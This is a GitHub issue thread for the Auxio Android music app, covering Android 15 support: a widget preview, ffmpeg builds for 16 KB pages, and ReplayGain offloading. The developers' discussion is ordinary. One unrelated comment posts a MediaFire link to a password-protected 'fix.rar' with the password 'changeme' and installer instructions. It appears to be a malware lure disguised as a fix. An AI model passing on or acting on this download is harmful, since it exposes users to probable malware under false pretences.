### ISSUE TITLE
Android 15

### ISSUE THREAD

**Issue by OxygenCobalt** [OxygenCobalt/Auxio#859]
Self-explanatory.
- Implement a dynamic widget preview
- Need to make sure ffmpeg extension is rebuilt and works for 16kb page sizes (This could possibly help speed up decoding)
- Investigate offloading my ReplayGain processor to Android's new loudness control system

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by VictorLamoine** [comment]
Off loading replay gain to Android would partially (only for Android 15 users) solve https://github.com/OxygenCobalt/Auxio/issues/389 👍🏼

**Comment by OxygenCobalt** [comment]
This I would guess is currently done, sans the volume normalization, which is waiting on a response from ExoPlayer developers. Once they respond I'll get back to this.

**Comment by OxygenCobalt** [comment]
I think the next release won't have a widget preview, I tried testing it on my device and I think it legitimately just triggers endless device reboots, will wait on it.
